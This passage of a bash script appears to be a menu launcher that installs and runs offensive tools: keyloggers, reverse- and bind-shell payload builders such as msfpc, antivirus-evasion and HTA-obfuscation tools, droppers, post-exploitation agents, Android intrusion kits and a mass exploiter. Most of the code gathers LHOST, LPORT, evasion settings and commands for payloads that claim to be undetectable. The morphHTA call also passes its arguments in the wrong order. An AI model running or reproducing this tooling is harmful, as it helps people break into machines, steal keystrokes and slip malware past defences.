3868 install_socialfish
3869 else
3870 continue
3871 fi
3872 fi
3873 cd
3874 elif [[ "$APPP" = "7" ]]
3875 then
3876 if [[ -d "/root/hakkuframework" ]]
3877 then
3878 while true
3879 do
3880 printf '\033]2;OSRFCONSOLE\a'
3881 clear
3882 echo -e ""$YS" 1"$CE") usufy"
3883 echo -e ""$YS" 2"$CE") mailfy"
3884 echo -e ""$YS" 3"$CE") searchfy"
3885 echo -e ""$YS" 4"$CE") domainfy"
3886 echo -e ""$YS" 5"$CE") phonefy"
3887 echo -e ""$YS" 6"$CE") entify"
3888 echo -e ""$YS" b"$CE") Go back"
3889 echo -e ""$YS"00"$CE") Main menu"
3890 # echo -e ""$YS" 0"$CE") EXIT"
3891 echo -e "Choose: "
3892 read -e OSFR
3893 clear
3894 if [[ "$OSFR" = "1" ]]
3895 then
3896 echo -e "Use: usufy.py -n name1 name2 -p twitter facebook"
3897 usufy.py
3898 exit
3899 elif [[ "$OSFR" = "2" ]]
3900 then
3901 echo -e "Use: mailfy.py -n name1"
3902 mailfy.py
3903 exit
3904 elif [[ "$OSFR" = "3" ]]
3905 then
3906 searchfy.py
3907 exit
3908 elif [[ "$OSFR" = "4" ]]
3909 then
3910 domainfy.py
3911 exit
3912 elif [[ "$OSFR" = "5" ]]
3913 then
3914 phonefy.py
3915 exit
3916 elif [[ "$OSFR" = "6" ]]
3917 then
3918 entify.py
3919 exit
3920 elif [[ "$OSFR" = "0" ]]
3921 then
3922 exit
3923 elif [[ "$OSFR" = "00" ]]
3924 then
3925 exec bash "$0"
3926 elif [[ "$OSFR" = "back" || "$OSFR" = "b" ]]
3927 then
3928 break
3929 else
3930 echo -e "Wrong choice"
3931 sleep 0.3
3932 clear
3933 exec bash "$0"
3934 fi
3935 done
3936 else
3937 echo -e "$TNI"
3938 read INSTALL
3939 if [[ "$INSTALL" = "install" ]]
3940 then
3941 install_osrframework
3942 else
3943 continue
3944 fi
3945 fi
3946 elif [[ "$APPP" = "0" ]]
3947 then
3948 clear
3949 exit
3950 elif [[ "$APPP" = "00" ]]
3951 then
3952 clear
3953 exec bash "$0"
3954 elif [[ "$APPP" = "back" || "$APPP" = "b" ]]
3955 then
3956 break
3957 fi
3958 if [[ "$APPP" != "" ]]
3959 then
3960 echo -e "$PAKTGB"
3961 $READAK
3962 fi
3963 done
3964}
3965function remote_access
3966{
3967 while true
3968 do
3969 clear
3970 TERMINALTITLE="REMOTE ACCESS"
3971 dash_calc
3972 printf '\033]2;REMOTE ACCESS\a'
3973 if [[ -d /root/BeeLogger ]]
3974 then
3975 echo -e ""$YS" 1"$CE") BeeLogger Generate Gmail Emailing Keyloggers to Windows"
3976 else
3977 echo -e ""$RS" 1"$CE") "$RS"BeeLogger"$CE" Generate Gmail Emailing Keyloggers to Windows"
3978 fi
3979 if [[ -d /root/ezsploit ]]
3980 then
3981 echo -e ""$YS" 2"$CE") Ezsploit Automation for metasploit"
3982 else
3983 echo -e ""$RS" 2"$CE") "$RS"Ezsploit"$CE" Automation for metasploit"
3984 fi
3985 if [[ -d /root/pupy ]]
3986 then
3987 echo -e ""$YS" 3"$CE") Pupy Remote administration and post-exploitation tool"
3988 else
3989 echo -e ""$RS" 3"$CE") "$RS"Pupy"$CE" Remote administration and post-exploitation tool"
3990 fi
3991 if [[ -d /root/zirikatu ]]
3992 then
3993 echo -e ""$YS" 4"$CE") Zirikatu Fud Payload generator script"
3994 else
3995 echo -e ""$RS" 4"$CE") "$RS"Zirikatu"$CE" Fud Payload generator script"
3996 fi
3997 if [[ -d /root/TheFatRat ]]
3998 then
3999 echo -e ""$YS" 5"$CE") TheFatRat Generate undetectable payloads"
4000 else
4001 echo -e ""$RS" 5"$CE") "$RS"TheFatRat"$CE" Generate undetectable payloads"
4002 fi
4003 if [[ -d /root/Winpayloads ]]
4004 then
4005 echo -e ""$YS" 6"$CE") Winpayloads Generate undetectable payloads"
4006 else
4007 echo -e ""$RS" 6"$CE") "$RS"Winpayloads"$CE" Generate undetectable payloads"
4008 fi
4009 if [[ -f /usr/bin/shellter ]]
4010 then
4011 echo -e ""$YS" 7"$CE") Shellter Inject payload into .exe"
4012 else
4013 echo -e ""$RS" 7"$CE") "$RS"Shellter"$CE" Inject payload into .exe"
4014 fi
4015 if [[ -d /root/CHAOS ]]
4016 then
4017 echo -e ""$YS" 8"$CE") CHAOS Generate payloads/listeners"
4018 else
4019 echo -e ""$RS" 8"$CE") "$RS"CHAOS"$CE" Generate payloads/listeners"
4020 fi
4021 if [[ -d /root/kwetza ]]
4022 then
4023 echo -e ""$YS" 9"$CE") Kwetza Inject payload to apk"
4024 else
4025 echo -e ""$RS" 9"$CE") "$RS"Kwetza"$CE" Inject payload to apk"
4026 fi
4027 if [[ -d /root/koadic ]]
4028 then
4029 echo -e ""$YS"10"$CE") Koadic Windows post-exploitation rootkit"
4030 else
4031 echo -e ""$RS"10"$CE") "$RS"Koadic"$CE" Windows post-exploitation rootkit"
4032 fi
4033 if [[ -d /root/Empire ]]
4034 then
4035 echo -e ""$YS"11"$CE") Empire PowerShell and Python post-exploitation agent"
4036 else
4037 echo -e ""$RS"11"$CE") "$RS"Empire"$CE" PowerShell and Python post-exploitation agent"
4038 fi
4039 if [[ -d /root/Meterpreter_Paranoid_Mode-SSL ]]
4040 then
4041 echo -e ""$YS"12"$CE") Meterpreter Paranoid Meterpreter Paranoid Mode - SSL/TLS connections"
4042 else
4043 echo -e ""$RS"12"$CE") "$RS"Meterpreter Paranoid"$CE" Meterpreter Paranoid Mode - SSL/TLS connections"
4044 fi
4045 if [[ -d /root/Dr0p1t-Framework ]]
4046 then
4047 echo -e ""$YS"13"$CE") Dr0p1t-Framework Create an advanced stealthy dropper"
4048 else
4049 echo -e ""$RS"13"$CE") "$RS"Dr0p1t-Framework"$CE" Create an advanced stealthy dropper"
4050 fi
4051 if [[ -d /root/Veil ]]
4052 then
4053 echo -e ""$YS"14"$CE") Veil-Framework Generate payloads that bypass common anti-virus"
4054 else
4055 echo -e ""$RS"14"$CE") "$RS"Veil-Framework"$CE" Generate payloads that bypass common anti-virus"
4056 fi
4057 if [[ -d /root/leviathan ]]
4058 then
4059 echo -e ""$YS"15"$CE") Leviathan Wide range mass audit toolkit"
4060 else
4061 echo -e ""$RS"15"$CE") "$RS"Leviathan"$CE" Wide range mass audit toolkit"
4062 fi
4063 if [[ -d /root/FakeImageExploiter ]]
4064 then
4065 echo -e ""$YS"16"$CE") FakeImageExploiter Use a Fake image.jpg to exploit targets"
4066 else
4067 echo -e ""$RS"16"$CE") "$RS"FakeImageExploiter"$CE" Use a Fake image.jpg to exploit targets"
4068 fi
4069 if [[ -d /root/avet ]]
4070 then
4071 echo -e ""$YS"17"$CE") Avet AntiVirus Evasion Tool"
4072 else
4073 echo -e ""$RS"17"$CE") "$RS"Avet"$CE" AntiVirus Evasion Tool"
4074 fi
4075 if [[ -d /root/ARCANUS ]]
4076 then
4077 echo -e ""$YS"18"$CE") Arcanus Customized payload generator/handler"
4078 else
4079 echo -e ""$RS"18"$CE") "$RS"Arcanus"$CE" Customized payload generator/handler"
4080 fi
4081 if [[ -f /usr/bin/msfpc ]]
4082 then
4083 echo -e ""$YS"19"$CE") MSFPC MSFvenom Payload Creator"
4084 else
4085 echo -e ""$RS"19"$CE") "$RS"MSFPC"$CE" MSFvenom Payload Creator"
4086 fi
4087 if [[ -d /root/morphHTA ]]
4088 then
4089 echo -e ""$YS"20"$CE") morphHTA Morphing Cobalt Strike's evil.HTA"
4090 else
4091 echo -e ""$RS"20"$CE") "$RS"morphHTA"$CE" Morphing Cobalt Strike's evil.HTA"
4092 fi
4093 if [[ -d /root/LFISuite ]]
4094 then
4095 echo -e ""$YS"21"$CE") LFISuite Totally Automatic LFI Exploiter and Scanner"
4096 else
4097 echo -e ""$RS"21"$CE") "$RS"LFISuite"$CE" Totally Automatic LFI Exploiter and Scanner"
4098 fi
4099 if [[ -d /root/UniByAv ]]
4100 then
4101 echo -e ""$YS"22"$CE") UniByAv Generate undetectable executable from raw shellcode"
4102 else
4103 echo -e ""$RS"22"$CE") "$RS"UniByAv"$CE" Generate undetectable executable from raw shellcode"
4104 fi
4105 if [[ -d /root/demiguise ]]
4106 then
4107 echo -e ""$YS"23"$CE") Demiguise HTA encryption tool for RedTeams"
4108 else
4109 echo -e ""$RS"23"$CE") "$RS"Demiguise"$CE" HTA encryption tool for RedTeams"
4110 fi
4111 if [[ -d /root/DKMC ]]
4112 then
4113 echo -e ""$YS"24"$CE") DKMC Malicious payload evasion tool into image"
4114 else
4115 echo -e ""$RS"24"$CE") "$RS"DKMC"$CE" Malicious payload evasion tool into image"
4116 fi
4117 if [[ -d /usr/share/beef-xss ]]
4118 then
4119 echo -e ""$YS"25"$CE") Beef The browser exploitation framework"
4120 else
4121 echo -e ""$RS"25"$CE") "$RS"Beef"$CE" The browser exploitation framework"
4122 fi
4123 if [[ -d /root/Evil-Droid ]]
4124 then
4125 echo -e ""$YS"26"$CE") Evil-Droid Penetrate android platforms"
4126 else
4127 echo -e ""$RS"26"$CE") "$RS"Evil-Droid"$CE" Penetrate android platforms"
4128 fi
4129 if [[ -d /root/EggShell ]]
4130 then
4131 echo -e ""$YS"27"$CE") EggShell Penetrate android platforms"
4132 else
4133 echo -e ""$RS"27"$CE") "$RS"EggShell"$CE" Penetrate android platforms"
4134 fi
4135 if [[ -d /root/Zerodoor ]]
4136 then
4137 echo -e ""$YS"28"$CE") Zerodoor Penetrate android platforms"
4138 else
4139 echo -e ""$RS"28"$CE") "$RS"Zerodoor"$CE" Penetrate android platforms"
4140 fi
4141 if [[ -d /root/cromos ]]
4142 then
4143 echo -e ""$YS"29"$CE") Cromos Download and Inject code into Google Chrome extensions"
4144 else
4145 echo -e ""$RS"29"$CE") "$RS"Cromos"$CE" Download and Inject code into Google Chrome extensions"
4146 fi
4147 if [[ -d /root/AutoSploit ]]
4148 then
4149 echo -e ""$YS"30"$CE") AutoSploit Automated Mass Exploiter"
4150 else
4151 echo -e ""$RS"30"$CE") "$RS"AutoSploit"$CE" Automated Mass Exploiter"
4152 fi
4153 if [[ -d /root/Enigma ]]
4154 then
4155 echo -e ""$YS"31"$CE") Enigma Multiplatform payload dropper"
4156 else
4157 echo -e ""$RS"31"$CE") "$RS"Enigma"$CE" Multiplatform payload dropper"
4158 fi
4159 echo -e ""$YS" b"$CE") Go back"
4160 echo -e ""$YS"00"$CE") Main menu"
4161 #echo -e ""$YS" 0"$CE") EXIT"
4162 echo -e "Choose: "
4163 read -e KEYLOG
4164 clear
4165 if [[ "$KEYLOG" = "1" ]]
4166 then
4167 if [[ -d /root/BeeLogger ]]
4168 then
4169 cd /root/BeeLogger
4170 python bee.py
4171 cd
4172 else
4173 echo -e "$TNI"
4174 read INSTALL
4175 if [[ "$INSTALL" = "install" ]]
4176 then
4177 install_beelogger
4178 else
4179 continue
4180 fi
4181 fi
4182 elif [[ "$KEYLOG" = "10" ]]
4183 then
4184 if [[ -d /root/koadic ]]
4185 then
4186 cd /root/koadic
4187 ./koadic
4188 else
4189 echo -e "$TNI"
4190 read INSTALL
4191 if [[ "$INSTALL" = "install" ]]
4192 then
4193 install_koadic
4194 else
4195 continue
4196 fi
4197 fi
4198 elif [[ "$KEYLOG" = "11" ]]
4199 then
4200 if [[ -d /root/Empire ]]
4201 then
4202 cd /root/Empire
4203 ./empire
4204 else
4205 echo -e "$TNI"
4206 read INSTALL
4207 if [[ "$INSTALL" = "install" ]]
4208 then
4209 install_empire
4210 else
4211 continue
4212 fi
4213 fi
4214 elif [[ "$KEYLOG" = "12" ]]
4215 then
4216 if [[ -d /root/Meterpreter_Paranoid_Mode-SSL ]]
4217 then
4218 cd /root/Meterpreter_Paranoid_Mode-SSL
4219 ./Meterpreter_Paranoid_Mode.sh
4220 else
4221 echo -e "$TNI"
4222 read INSTALL
4223 if [[ "$INSTALL" = "install" ]]
4224 then
4225 install_meterpreter_paranoid_mode
4226 else
4227 continue
4228 fi
4229 fi
4230 elif [[ "$KEYLOG" = "13" ]]
4231 then
4232 if [[ -d /root/Dr0p1t-Framework ]]
4233 then
4234 cd /root/Dr0p1t-Framework
4235 dropit_automation
4236 else
4237 echo -e "$TNI"
4238 read INSTALL
4239 if [[ "$INSTALL" = "install" ]]
4240 then
4241 install_dropit_frmw
4242 else
4243 continue
4244 fi
4245 fi
4246 elif [[ "$KEYLOG" = "14" ]]
4247 then
4248 if [[ -d /root/Veil ]]
4249 then
4250 cd /root/Veil
4251 ./Veil.py
4252 else
4253 echo -e "$TNI"
4254 read INSTALL
4255 if [[ "$INSTALL" = "install" ]]
4256 then
4257 install_veil
4258 else
4259 continue
4260 fi
4261 fi
4262 elif [[ "$KEYLOG" = "15" ]]
4263 then
4264 if [[ -d /root/leviathan ]]
4265 then
4266 cd /root/leviathan
4267 python leviathan.py
4268 else
4269 echo -e "$TNI"
4270 read INSTALL
4271 if [[ "$INSTALL" = "install" ]]
4272 then
4273 install_leviathan
4274 else
4275 continue
4276 fi
4277 fi
4278 elif [[ "$KEYLOG" = "16" ]]
4279 then
4280 if [[ -d /root/FakeImageExploiter ]]
4281 then
4282 cd /root/FakeImageExploiter
4283 nano settings
4284 ./FakeImageExploiter.sh
4285 else
4286 echo -e "$TNI"
4287 read INSTALL
4288 if [[ "$INSTALL" = "install" ]]
4289 then
4290 install_fake_image
4291 else
4292 continue
4293 fi
4294 fi
4295 elif [[ "$KEYLOG" = "17" ]]
4296 then
4297 if [[ -d /root/avet ]]
4298 then
4299 cd /root/avet/build
4300 ls -1 build*
4301 echo -e ""
4302 echo -e "Type which one you want: "
4303 read AVE
4304 if [[ ! -f /root/avet/build/"$AVE" ]]
4305 then
4306 echo -e ""$RS"File not found"$CE""
4307 sleep 2
4308 else
4309 nano /root/avet/build/"$AVE"
4310 echo -e "$PAKTC"
4311 $READAK
4312 cd /root/avet
4313 ./build/"$AVE"
4314 gio open /root/avet
4315 fi
4316 else
4317 echo -e "$TNI"
4318 read INSTALL
4319 if [[ "$INSTALL" = "install" ]]
4320 then
4321 install_avet
4322 else
4323 continue
4324 fi
4325 fi
4326 elif [[ "$KEYLOG" = "18" ]]
4327 then
4328 if [[ -d /root/ARCANUS ]]
4329 then
4330 cd /root/ARCANUS
4331 gnome-terminal -e "./ARCANUS & disown"
4332 else
4333 echo -e "$TNI"
4334 read INSTALL
4335 if [[ "$INSTALL" = "install" ]]
4336 then
4337 install_arcanus
4338 else
4339 continue
4340 fi
4341 fi
4342 elif [[ "$KEYLOG" = "19" ]]
4343 then
4344 if [[ -f /usr/bin/msfpc ]]
4345 then
4346 while true
4347 do
4348 clear
4349 echo -e ""$YS" 1"$CE") APK"
4350 echo -e ""$YS" 2"$CE") ASP"
4351 echo -e ""$YS" 3"$CE") ASPX"
4352 echo -e ""$YS" 4"$CE") Bash [.sh]"
4353 echo -e ""$YS" 5"$CE") Java [.jsp]"
4354 echo -e ""$YS" 6"$CE") Linux [.elf]"
4355 echo -e ""$YS" 7"$CE") OSX [.macho]"
4356 echo -e ""$YS" 8"$CE") Perl [.pl]"
4357 echo -e ""$YS" 9"$CE") PHP"
4358 echo -e ""$YS"10"$CE") Powershell [.ps1]"
4359 echo -e ""$YS"11"$CE") Python [.py]"
4360 echo -e ""$YS"12"$CE") Tomcat [.war]"
4361 echo -e ""$YS"13"$CE") Windows [.exe // .dll]"
4362 echo -e ""$YS"ENTER"$CE") Windows [.exe // .dll]"
4363 echo -e ""
4364 echo -e "Choose: "
4365 read TYPE
4366 if [[ "$TYPE" -le 13 && "$TYPE" -ge 1 ]]
4367 then
4368 if [[ "$TYPE" = 1 ]]
4369 then
4370 MTYPE="APK"
4371 elif [[ "$TYPE" = 2 ]]
4372 then
4373 MTYPE="ASP"
4374 elif [[ "$TYPE" = 3 ]]
4375 then
4376 MTYPE="ASPX"
4377 elif [[ "$TYPE" = 4 ]]
4378 then
4379 MTYPE="bash"
4380 elif [[ "$TYPE" = 5 ]]
4381 then
4382 MTYPE="java"
4383 elif [[ "$TYPE" = 6 ]]
4384 then
4385 MTYPE="linux"
4386 elif [[ "$TYPE" = 7 ]]
4387 then
4388 MTYPE="OSX"
4389 elif [[ "$TYPE" = 8 ]]
4390 then
4391 MTYPE="perl"
4392 elif [[ "$TYPE" = 9 ]]
4393 then
4394 MTYPE="PHP"
4395 elif [[ "$TYPE" = 10 ]]
4396 then
4397 MTYPE="powershell"
4398 elif [[ "$TYPE" = 11 ]]
4399 then
4400 MTYPE="python"
4401 elif [[ "$TYPE" = 12 ]]
4402 then
4403 MTYPE="tomcat"
4404 elif [[ "$TYPE" = 13 ]]
4405 then
4406 MTYPE="windows"
4407 fi
4408 else
4409 if [[ "$TYPE" = "" ]]
4410 then
4411 MTYPE="windows"
4412 else
4413 echo -e ""$RS"Wrong choise"$CE""
4414 sleep 1
4415 clear
4416 continue
4417 fi
4418 fi
4419 clear
4420 echo -e "LHOST: "
4421 read MLHOST
4422 clear
4423 echo -e "LPORT: "
4424 read MLPORT
4425 clear
4426 echo -e ""$YS" 1"$CE") CMD Smaller size but less features"
4427 echo -e ""$YS" 2"$CE") MSF Bigger size but more features"
4428 echo -e ""$YS"ENTER"$CE") MSF"
4429 echo -e "Choose: "
4430 read CMDMSF
4431 if [[ "$CMDMSF" = 1 ]]
4432 then
4433 MCMDMSF="CMD"
4434 else
4435 MCMDMSF="MSF"
4436 fi
4437 clear
4438 echo -e ""$YS" 1"$CE") Bind"
4439 echo -e ""$YS" 2"$CE") Reverse"
4440 echo -e ""$YS"ENTER"$CE") Reverse"
4441 echo -e "Choose: "
4442 read BR
4443 if [[ "$BR" = 1 ]]
4444 then
4445 MBR="BIND"
4446 else
4447 MBR="REVERSE"
4448 fi
4449 clear
4450 echo -e ""$YS" 1"$CE") Staged"
4451 echo -e ""$YS" 2"$CE") Stageless"
4452 echo -e ""$YS"ENTER"$CE") Staged"
4453 echo -e "Choose: "
4454 read SORS
4455 if [[ "$SORS" = 2 ]]
4456 then
4457 MSORS="STAGELESS"
4458 else
4459 MSORS="STAGED"
4460 fi
4461 clear
4462 echo -e ""$YS" 1"$CE") TCP"
4463 echo -e ""$YS" 2"$CE") HTTP"
4464 echo -e ""$YS" 3"$CE") HTTPS"
4465 echo -e ""$YS" 4"$CE") FIND_PORT"
4466 echo -e ""$YS"ENTER"$CE") TCP"
4467 echo -e "Choose: "
4468 read PRT
4469 if [[ "$PRT" = 2 ]]
4470 then
4471 MPRT="HTTP"
4472 elif [[ "$PRT" = 3 ]]
4473 then
4474 MPRT="HTTPS"
4475 elif [[ "$PRT" = 4 ]]
4476 then
4477 MPRT="FIND_PORT"
4478 else
4479 MPRT="TCP"
4480 fi
4481 clear
4482 msfpc $MTYPE $MLHOST $MLPORT $MCMDMSF $MBR $MSORS $MPRT
4483 break
4484 done
4485 else
4486 echo -e "$TNI"
4487 read INSTALL
4488 if [[ "$INSTALL" = "install" ]]
4489 then
4490 install_msfpc
4491 else
4492 continue
4493 fi
4494 fi
4495 elif [[ "$KEYLOG" = "20" ]]
4496 then
4497 if [[ -d /root/morphHTA ]]
4498 then
4499 while true
4500 do
4501 clear
4502 echo -e "Your file's path: "
4503 read FPATH
4504 if [[ ! -f "$FPATH" ]]
4505 then
4506 echo -e ""$RS"File does not exist"$CE""
4507 sleep 2
4508 continue
4509 fi
4510 clear
4511 echo -e ""$YS" 1"$CE") MSHTA"
4512 echo -e ""$YS" 2"$CE") Explorer"
4513 echo -e ""$YS" 3"$CE") WmiPrvSE"
4514 echo -e ""$YS"ENTER"$CE") Explorer"
4515 echo -e "Choose technique to use:: "
4516 read MODE
4517 if [[ "$MODE" = 1 ]]
4518 then
4519 MMODE="mshta"
4520 elif [[ "$MODE" = 3 ]]
4521 then
4522 MMODE="wmiprvse"
4523 else
4524 MMODE="explorer"
4525 fi
4526 clear
4527 echo -e "Enter max length of randomly generated strings: "
4528 echo -e ""$YS"ENTER"$CE") 1000"
4529 read M1
4530 if [[ "$M1" = "" ]]
4531 then
4532 M1=1000
4533 fi
4534 clear
4535 echo -e "Enter max length of randomly generated variable names: "
4536 echo -e ""$YS"ENTER"$CE") 40"
4537 read M2
4538 if [[ "$M2" = "" ]]
4539 then
4540 M2=40
4541 fi
4542 clear
4543 echo -e "Enter max number of times values should be split in chr obfuscation: "
4544 echo -e ""$YS"ENTER"$CE") 10"
4545 read M3
4546 if [[ "$M3" = "" ]]
4547 then
4548 M3=10
4549 fi
4550 clear
4551 echo -e "Enter value of each split: "
4552 echo -e ""$YS"ENTER"$CE") 10"
4553 read M4
4554 if [[ "$M4" = "" ]]
4555 then
4556 M4=10
4557 fi
4558 while true
4559 do
4560 clear
4561 echo -e "Enter file to output the morphed HTA to: "
4562 echo -e ""$YS"ENTER"$CE") /root/Desktop/morph.HTA"
4563 read M5
4564 if [[ "$M5" = "" ]]
4565 then
4566 M5="/root/Desktop/morph.HTA"
4567 fi
4568 if [[ -f "$M5" ]]
4569 then
4570 echo -e ""$RS"File already exists"$CE""
4571 sleep 3
4572 continue
4573 else
4574 break
4575 fi
4576 done
4577 break
4578 done
4579 clear
4580 cd /root/morphHTA
4581 python morph-hta.py --in "$FPATH" --out "$M5" --mode "$M1" --maxstrlen "$M2" --maxvarlen "$M3" --maxnumsplit "$M4"
4582 cd
4583 else
4584 echo -e "$TNI"
4585 read INSTALL
4586 if [[ "$INSTALL" = "install" ]]
4587 then
4588 install_morphhta
4589 else
4590 continue
4591 fi
4592 fi
4593 elif [[ "$KEYLOG" = "21" ]]
4594 then
4595 if [[ -d /root/LFISuite ]]
4596 then
4597 cd /root/LFISuite
4598 python lfisuite.py
4599 else
4600 echo -e "$TNI"
4601 read INSTALL
4602 if [[ "$INSTALL" = "install" ]]
4603 then
4604 install_lfi
4605 else
4606 continue
4607 fi
4608 fi
4609 elif [[ "$KEYLOG" = "22" ]]
4610 then
4611 if [[ -d /root/UniByAv ]]
4612 then
4613 while true
4614 do
4615 clear
4616 echo -e "Path to raw shellcode file you want to use: "
4617 read RPATH
4618 if [[ ! -f "$RPATH" ]]
4619 then
4620 echo -e ""$RS"File not found"$CE""
4621 sleep 2
4622 continue
4623 fi
4624 clear
4625 echo -e "Name of output file: "
4626 read OUT
4627 if [[ -f "$OUT" ]]
4628 then
4629 echo -e ""$RS"File already exists"$CE""
4630 sleep 2
4631 continue
4632 fi
4633 clear
4634 echo -e "Bypass Antivirus or just generate executable?"
4635 echo -e ""$YS" 1"$CE") Bypass"
4636 echo -e ""$YS" 2"$CE") Just generate"
4637 echo -e ""$YS"ENTER"$CE") Bypass"
4638 echo -e "Choose: "
4639 read BORG
4640 clear
4641 if [[ "$BORG" = 2 ]]
4642 then
4643 echo -e ""$YS" 1"$CE") domain.json"
4644 echo -e ""$YS" 2"$CE") process-and-time-evasion.json"
4645 echo -e ""$YS" 3"$CE") process-evasion.json"
4646 echo -e ""$YS"ENTER"$CE") process-evasion.json"
4647 echo -e "Choose: "
4648 read CONF
4649 if [[ "$CONF" = 1 ]]
4650 then
4651 FC="domain.json"
4652 elif [[ "$CONF" = 2 ]]
4653 then
4654 FC="process-and-time-evasion.json"
4655 else
4656 FC="process-evasion.json"
4657 fi
4658 cd /root/UniByAv
4659 python UniByAv*.py "$RPATH" "$OUT" none /root/UniByAv/configs/"$FC"
4660 break
4661 else
4662 #~ GCC=$(which gcc)
4663 #~ if [[ "$GCC" = "" ]]
4664 #~ then
4665 #~ echo -e ""$RS"gcc not found on your system"$CE""
4666 #~ sleep 2
4667 #~ echo -e "Proceeding without bypassing Antivirus..."
4668 #~ sleep 3
4669 #~ clear
4670 #~ echo -e ""$YS" 1"$CE") domain.json"
4671 #~ echo -e ""$YS" 2"$CE") process-and-time-evasion.json"
4672 #~ echo -e ""$YS" 3"$CE") process-evasion.json"
4673 #~ echo -e ""$YS"ENTER"$CE") process-evasion.json"
4674 #~ echo -e "Choose: "
4675 #~ read CONF
4676 #~ if [[ "$CONF" = 1 ]]
4677 #~ then
4678 #~ FC="domain.json"
4679 #~ elif [[ "$CONF" = 2 ]]
4680 #~ then
4681 #~ FC="process-and-time-evasion.json"
4682 #~ else
4683 #~ FC="process-evasion.json"
4684 #~ fi
4685 #~ cd /root/UniByAv
4686 #~ python UniByAv*.py "$RPATH" "$OUT" none /root/UniByAv/configs/"$FC"
4687 #~ break
4688 #~ else
4689 echo -e "Path to mingw32-gcc.exe : "
4690 read PGCC
4691 #~ if [[ "$PGCC" = "" ]]
4692 #~ then
4693 #~ PGCC="$GCC"
4694 #~ fi
4695 clear
4696 echo -e ""$YS" 1"$CE") domain.json"
4697 echo -e ""$YS" 2"$CE") process-and-time-evasion.json"
4698 echo -e ""$YS" 3"$CE") process-evasion.json"
4699 echo -e ""$YS"ENTER"$CE") process-evasion.json"
4700 echo -e "Choose: "
4701 read CONF
4702 if [[ "$CONF" = 1 ]]
4703 then
4704 FC="domain.json"
4705 elif [[ "$CONF" = 2 ]]
4706 then
4707 FC="process-and-time-evasion.json"
4708 else
4709 FC="process-evasion.json"
4710 fi
4711 cd /root/UniByAv
4712 python UniByAv*.py "$RPATH" "$OUT" "$PGCC" /root/UniByAv/configs/"$FC"
4713 break
4714 #~ fi
4715 fi
4716 done
4717 cd /root/UniByAv
4718 python UniByAv*.py
4719 else
4720 echo -e "$TNI"
4721 read INSTALL
4722 if [[ "$INSTALL" = "install" ]]
4723 then
4724 install_unibyav
4725 else
4726 continue
4727 fi
4728 fi
4729
4730 elif [[ "$KEYLOG" = "23" ]]
4731 then
4732 if [[ -d /root/demiguise ]]
4733 then
4734 while true
4735 do
4736 clear
4737 echo -e "Encryption key: "
4738 read ENC
4739 clear
4740 echo -e ""$YS" 1"$CE") ShellBrowserWindow"
4741 echo -e ""$YS" 2"$CE") Outlook.Application"
4742 echo -e ""$YS" 3"$CE") Excel.RegisterXLL"
4743 echo -e ""$YS" 4"$CE") WbemScripting.SWbemLocator"
4744 echo -e "Choose payload type: "
4745 read PT
4746 if [[ "$PT" -le 4 && "$PT" -ge 1 ]]
4747 then
4748 if [[ "$PT" = 1 ]]
4749 then
4750 PTT="ShellBrowserWindow"
4751 elif [[ "$PT" = 2 ]]
4752 then
4753 PTT="Outlook.Application"
4754 elif [[ "$PT" = 3 ]]
4755 then
4756 PTT="Excel.RegisterXLL"
4757 elif [[ "$PT" = 4 ]]
4758 then
4759 PTT="WbemScripting.SWbemLocator"
4760 fi
4761 clear
4762 echo -e "Command to run from HTA: "
4763 read CHTA
4764 if [[ "$CHTA" = "" ]]
4765 then
4766 CCHTA=""
4767 else
4768 CCHTA="-c "$CHTA""
4769 fi
4770 clear
4771 echo -e "Output file name: "
4772 read FN
4773 cd /root/demiguise
4774 python demiguise.py -k "$ENC" -p "$PTT" "$CCHTA" -o "$FN"
4775 if [[ -f /root/demiguise/$FN ]]
4776 then
4777 echo -e "Output file: /root/demiguise/"$FN""
4778 else
4779 if [[ -f /root/demiguise/$FN.html ]]
4780 then
4781 echo -e "Output file: /root/demiguise/"$FN".html"
4782 fi
4783 fi
4784 break
4785 else
4786 echo -e ""$RS"Wrong choise"$CE""
4787 sleep 2
4788 continue
4789 fi
4790 done
4791 else
4792 echo -e "$TNI"
4793 read INSTALL
4794 if [[ "$INSTALL" = "install" ]]
4795 then
4796 install_demiguise
4797 else
4798 continue
4799 fi
4800 fi
4801 elif [[ "$KEYLOG" = "24" ]]
4802 then
4803 if [[ -d /root/DKMC ]]
4804 then
4805 cd /root/DKMC
4806 python dkmc.py
4807 else
4808 echo -e "$TNI"
4809 read INSTALL
4810 if [[ "$INSTALL" = "install" ]]
4811 then
4812 install_dkmc
4813 else
4814 continue
4815 fi
4816 fi
4817 elif [[ "$KEYLOG" = "25" ]]
4818 then
4819 if [[ -d /usr/share/beef-xss ]]
4820 then
4821 cd /usr/share/beef-xss
4822 ./beef
4823 else
4824 echo -e "$TNI"
4825 read INSTALL
4826 if [[ "$INSTALL" = "install" ]]
4827 then
4828 install_beef
4829 else
4830 continue
4831 fi
4832 fi
4833 elif [[ "$KEYLOG" = "26" ]]
4834 then
4835 if [[ -d /root/Evil-Droid ]]
4836 then
4837 cd /root/Evil-Droid
4838 ./evil-droid
4839 else
4840 echo -e "$TNI"
4841 read INSTALL
4842 if [[ "$INSTALL" = "install" ]]
4843 then
4844 install_evil_droid
4845 else
4846 continue
4847 fi
4848 fi
4849 elif [[ "$KEYLOG" = "27" ]]
4850 then
4851 if [[ -d /root/EggShell ]]
4852 then
4853 cd /root/EggShell
4854 python eggshell.py
4855 else
4856 echo -e "$TNI"
4857 read INSTALL
4858 if [[ "$INSTALL" = "install" ]]
4859 then
4860 install_eggshell
4861 else
4862 continue
4863 fi
4864 fi
4865 elif [[ "$KEYLOG" = "28" ]]
4866 then
4867 if [[ -d /root/Zerodoor ]]
4868 then
4869 cd /root/Zerodoor
4870 python zerodoor.py
4871 else
4872 echo -e "$TNI"
4873 read INSTALL
4874 if [[ "$INSTALL" = "install" ]]
4875 then
4876 install_zerodoor
4877 else
4878 continue
4879 fi
4880 fi
4881 elif [[ "$KEYLOG" = "29" ]]
4882 then
4883 if [[ -d /root/cromos ]]
4884 then
4885 cd /root/cromos
4886 cromos_menu
4887 else
4888 echo -e "$TNI"
4889 read INSTALL
4890 if [[ "$INSTALL" = "install" ]]
4891 then
4892 install_cromos
4893 else
4894 continue
4895 fi
4896 fi
4897 elif [[ "$KEYLOG" = "30" ]]
4898 then
4899 if [[ -d /root/AutoSploit ]]
4900 then
4901 cd /root/AutoSploit
4902 python autosploit.py
4903 else
4904 echo -e "$TNI"
4905 read INSTALL
4906 if [[ "$INSTALL" = "install" ]]
4907 then
4908 install_autosploit
4909 else
4910 continue
4911 fi
4912 fi
